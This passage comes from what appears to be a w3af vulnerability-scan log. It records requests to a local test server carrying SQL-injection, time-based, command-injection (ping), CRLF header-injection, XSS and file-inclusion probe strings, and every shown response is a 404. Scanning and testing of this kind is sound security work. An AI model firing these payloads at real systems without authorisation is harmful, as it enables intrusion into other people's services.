code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="384">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/uqhjx%3C%2F-%3Euqhjx%2F%2Auqhjx%22uqhjxuqhjx%27uqhjxuqhjx%60uqhjxuqhjx+%3D HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="384">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="385">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%22+OR+%2267%22%3D%2267 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="385">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="394">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/N2iAcZWJ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="394">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="411">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%22+AND+%2267%22%3D%2268 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="411">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="418">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="418">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="422">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="422">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="425">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%27+OR+%2767%27%3D%2767 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="425">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="433">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67%27+AND+%2767%27%3D%2768 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="433">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="434">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="434">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="435">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="435">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="447">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67+OR+67%3D67+ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="447">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="468">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/67+AND+67%3D68+ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="468">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="484">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="484">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="492">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="492">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="529">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="529">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="531">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="531">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="535">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="538">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="538">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="541">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="543">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="543">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="547">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="547">
